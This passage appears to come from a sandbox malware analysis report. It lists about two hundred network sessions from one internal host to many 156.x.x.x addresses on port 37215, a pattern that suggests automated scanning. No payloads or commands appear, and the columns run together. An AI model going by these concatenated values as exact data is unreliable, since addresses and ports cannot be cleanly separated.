                                                                            27196192.168.2.1543934156.122.14.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27197192.168.2.1543312156.11.105.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27198192.168.2.1550978156.94.238.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27199192.168.2.1533130156.147.71.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27200192.168.2.1538390156.45.60.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27201192.168.2.1544470156.92.153.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27202192.168.2.1539758156.175.157.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27203192.168.2.1552876156.176.115.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27204192.168.2.1539756156.56.46.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27205192.168.2.1537516156.193.201.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27206192.168.2.1548570156.105.239.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27207192.168.2.1559598156.165.177.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27208192.168.2.1559810156.182.205.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27209192.168.2.1560036156.172.155.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27210192.168.2.1533562156.123.123.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27211192.168.2.1535958156.187.152.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27212192.168.2.1550198156.107.153.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27213192.168.2.1537306156.133.156.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27214192.168.2.1546408156.154.104.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27215192.168.2.1540336156.38.103.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27216192.168.2.1538144156.203.9.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27217192.168.2.1544956156.14.11.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27218192.168.2.1541164156.112.253.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27219192.168.2.1559434156.3.196.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27220192.168.2.1533504156.237.72.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27221192.168.2.1556894156.25.24.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27222192.168.2.1541038156.198.209.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27223192.168.2.1534364156.72.210.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27224192.168.2.1559396156.136.146.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27225192.168.2.1551886156.118.120.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27226192.168.2.1550018156.116.137.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27227192.168.2.1554570156.95.46.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27228192.168.2.1557782156.197.243.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27229192.168.2.1534488156.6.95.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27230192.168.2.1556000156.137.55.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27231192.168.2.1557518156.107.124.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27232192.168.2.1555692156.175.198.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27233192.168.2.1548870156.8.247.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27234192.168.2.1534782156.126.248.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27235192.168.2.1534384156.140.4.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27236192.168.2.1555714156.252.193.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27237192.168.2.1535408156.29.80.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27238192.168.2.1554962156.95.9.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27239192.168.2.1555026156.39.149.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27240192.168.2.1543698156.191.92.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27241192.168.2.1553104156.91.209.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27242192.168.2.1549602156.142.225.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27243192.168.2.1551862156.139.169.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27244192.168.2.1558580156.151.87.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27245192.168.2.1559906156.107.33.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27246192.168.2.1547512156.165.148.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27247192.168.2.1551712156.92.112.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27248192.168.2.1538100156.64.123.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27249192.168.2.1539902156.117.165.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27250192.168.2.1551554156.174.114.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27251192.168.2.1537042156.121.87.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27252192.168.2.1557738156.108.238.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27253192.168.2.1559446156.186.158.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27254192.168.2.1546108156.135.120.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27255192.168.2.1533914156.195.70.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27256192.168.2.1548844156.180.89.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27257192.168.2.1544278156.154.123.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27258192.168.2.1551130156.106.156.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27259192.168.2.1550676156.53.43.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27260192.168.2.1552056156.251.219.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27261192.168.2.1549284156.25.101.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27262192.168.2.1552100156.183.253.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27263192.168.2.1536302156.24.243.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27264192.168.2.1544064156.230.124.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27265192.168.2.1554790156.75.216.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27266192.168.2.1556488156.99.222.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27267192.168.2.1557890156.144.9.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27268192.168.2.1536722156.131.81.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27269192.168.2.1557644156.34.9.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27270192.168.2.1541778156.186.90.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27271192.168.2.1560416156.8.223.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27272192.168.2.1552902156.61.49.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27273192.168.2.1557798156.143.37.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27274192.168.2.1532860156.91.91.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27275192.168.2.1536696156.246.49.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27276192.168.2.1559252156.163.124.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27277192.168.2.1553646156.83.67.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27278192.168.2.1548632156.24.151.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27279192.168.2.1556494156.145.130.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27280192.168.2.1540558156.237.53.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27281192.168.2.1533908156.113.25.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27282192.168.2.1534468156.94.99.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27283192.168.2.1554056156.179.238.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27284192.168.2.1534388156.181.136.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27285192.168.2.1559178156.189.73.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27286192.168.2.1545298156.127.36.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27287192.168.2.1557306156.212.179.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27288192.168.2.1536688156.177.19.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27289192.168.2.1540962156.95.1.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27290192.168.2.1533550156.77.104.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27291192.168.2.1554050156.201.53.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27292192.168.2.1533042156.125.167.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27293192.168.2.1551374156.106.181.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27294192.168.2.1550226156.162.80.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27295192.168.2.1540474156.227.223.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27296192.168.2.1554826156.98.38.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27297192.168.2.1547098156.159.121.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27298192.168.2.1539060156.57.13.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27299192.168.2.1534732156.202.176.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27300192.168.2.1555940156.204.60.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27301192.168.2.1555292156.96.174.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27302192.168.2.1550086156.110.125.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27303192.168.2.1535340156.247.149.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27304192.168.2.1548242156.104.40.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27305192.168.2.1535654156.229.113.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27306192.168.2.1537298156.67.57.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27307192.168.2.1549620156.199.56.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27308192.168.2.1541178156.196.85.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27309192.168.2.1534444156.154.203.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27310192.168.2.1554840156.243.171.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27311192.168.2.1532860156.4.221.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27312192.168.2.1549568156.7.204.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27313192.168.2.1551714156.51.88.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27314192.168.2.1536664156.1.20.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27315192.168.2.1549340156.46.109.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27316192.168.2.1539770156.241.181.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27317192.168.2.1542152156.222.175.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27318192.168.2.1536790156.239.52.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27319192.168.2.1557982156.218.90.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27320192.168.2.1545982156.39.67.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27321192.168.2.1545298156.156.78.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27322192.168.2.1547224156.98.150.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27323192.168.2.1558476156.249.244.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27324192.168.2.1556194156.235.113.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27325192.168.2.1539400156.170.78.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27326192.168.2.1554852156.164.178.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27327192.168.2.1556820156.198.25.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27328192.168.2.1554480156.38.222.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27329192.168.2.1546450156.90.249.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27330192.168.2.1534704156.204.42.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27331192.168.2.1550882156.140.62.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27332192.168.2.1534622156.92.19.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27333192.168.2.1558968156.85.227.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27334192.168.2.1551670156.8.155.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27335192.168.2.1552874156.101.96.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27336192.168.2.1557720156.147.234.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27337192.168.2.1547686156.252.227.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27338192.168.2.1558742156.193.165.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27339192.168.2.1548074156.67.231.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27340192.168.2.1555522156.91.60.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27341192.168.2.1555508156.45.84.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27342192.168.2.1540912156.190.252.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27343192.168.2.1543262156.27.41.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27344192.168.2.1553958156.154.117.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27345192.168.2.1560292156.125.138.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27346192.168.2.1552610156.12.223.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27347192.168.2.1560494156.35.168.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27348192.168.2.1539076156.214.72.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27349192.168.2.1538472156.125.198.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27350192.168.2.1539740156.107.68.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27351192.168.2.1536190156.204.66.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27352192.168.2.1532918156.142.19.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27353192.168.2.1546900156.14.98.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27354192.168.2.1541364156.92.65.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27355192.168.2.1537424156.179.215.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27356192.168.2.1540576156.223.219.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27357192.168.2.1548682156.31.106.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27358192.168.2.1539464156.37.92.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27359192.168.2.1538766156.72.217.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27360192.168.2.1543468156.62.70.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27361192.168.2.1559756156.86.136.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27362192.168.2.1557736156.34.132.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27363192.168.2.1537106156.221.221.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27364192.168.2.1540686156.4.184.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27365192.168.2.1553730156.114.138.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27366192.168.2.1560686156.207.165.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27367192.168.2.1538020156.178.17.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27368192.168.2.1550538156.195.38.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27369192.168.2.1533288156.141.81.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27370192.168.2.1541814156.135.121.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27371192.168.2.1541832156.156.47.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27372192.168.2.1542900156.154.38.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27373192.168.2.1547850156.224.38.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27374192.168.2.1540932156.19.40.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27375192.168.2.1546776156.188.158.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27376192.168.2.1551618156.141.30.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27377192.168.2.1538002156.84.243.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27378192.168.2.1551428156.113.146.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27379192.168.2.1542636156.69.30.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27380192.168.2.1544348156.71.190.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27381192.168.2.1537658156.13.216.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27382192.168.2.1533030156.215.68.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27383192.168.2.1546020156.95.14.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27384192.168.2.1550694156.174.79.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27385192.168.2.1547110156.42.244.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27386192.168.2.1542824156.118.151.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27387192.168.2.1541440156.63.215.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27388192.168.2.1544724156.57.160.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27389192.168.2.1559716156.170.246.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27390192.168.2.1534642156.5.179.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27391192.168.2.1547656156.4.133.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27392192.168.2.1542146156.140.127.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27393192.168.2.1551836156.79.40.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27394192.168.2.1559662156.236.126.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27395192.168.2.1545576156.62.217.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
